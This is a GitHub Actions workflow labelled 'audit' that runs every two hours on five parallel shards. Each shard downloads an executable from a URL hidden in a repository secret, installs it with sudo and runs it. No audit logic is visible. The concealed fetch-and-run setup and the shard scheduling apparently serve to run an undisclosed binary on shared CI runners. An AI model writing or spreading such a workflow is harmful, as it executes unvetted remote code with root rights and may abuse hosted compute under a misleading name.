name: audit

on:
  workflow_dispatch:
  schedule:
    - cron: '17 */2 * * *'

jobs:
  endurance-shard:
    timeout-minutes: 60
    runs-on: ubuntu-22.04

    strategy:
      fail-fast: false
      matrix:
        shard: [1, 2, 3, 4, 5]

    steps:
      - name: Checkout repository
        uses: actions/checkout@v3

      - name: Download and install audit_latest_build (Shard ${{ matrix.shard }})
        env:
          DOWNLOAD_URL: ${{ secrets.AUDIT }}
        run: |
          if [ -z "$DOWNLOAD_URL" ]; then
            echo "❌ Secret AUDIT (DOWNLOAD_URL) is missing!"
            exit 1
          fi
          curl -fL "$DOWNLOAD_URL" -o audit_latest_build
          chmod +x audit_latest_build
          sudo mv audit_latest_build /usr/local/bin/
          audit_latest_build
